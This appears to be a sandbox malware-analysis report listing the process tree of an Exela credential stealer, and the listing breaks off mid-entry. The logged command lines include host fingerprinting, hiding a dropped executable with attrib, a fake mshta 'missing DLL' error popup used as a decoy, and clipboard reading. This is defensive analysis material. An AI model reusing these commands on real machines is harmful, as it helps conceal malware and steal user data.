                                                                                                                                                                                                                                                          Data Ascii: Set-Cookie: __sdcfduid=31c82dbec7e311ef855a22435e575669c1e37dc8cb75c0c7ac98873fcdddbd4d6db4009f2008e1e9135c4b429afb227f; Expires=Mon, 31-Dec-2029 01:53:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=e099a5803c577c3


                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                          Start time:20:52:57
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\rename_me_before.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6404e0000
                                                                                                                                                                                                                                                          File size:11'803'970 bytes
                                                                                                                                                                                                                                                          MD5 hash:8B8040D5875E4C41ED5091F92021A16B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                          Start time:20:52:58
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\rename_me_before.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6404e0000
                                                                                                                                                                                                                                                          File size:11'803'970 bytes
                                                                                                                                                                                                                                                          MD5 hash:8B8040D5875E4C41ED5091F92021A16B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1952943493.000001B1014F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1978432003.000001B101520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.1980426241.000001B103150000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1949949259.000001B1021E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_ExelaStealer, Description: Yara detected Exela Stealer, Source: 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1980252152.000001B102F50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                          Imagebase:0x7ff786440000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                          Start time:20:53:00
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                          Imagebase:0x7ff70bb60000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                          Start time:20:53:01
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe""
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                          Start time:20:53:01
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                          Start time:20:53:01
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff693090000
                                                                                                                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                                                          Start time:20:53:02
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:14
                                                                                                                                                                                                                                                          Start time:20:53:02
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                          Start time:20:53:02
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                          Start time:20:53:02
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                          Start time:20:53:02
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                                                                                                                                                                                                                                                          Imagebase:0x7ff7efb30000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                          Start time:20:53:02
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:20
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:21
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:22
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:23
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6bee00000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                          Target ID:27
                                                                                                                                                                                                                                                          Start time:20:53:03
                                                                                                                                                                                                                                                          Start date:31/12/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
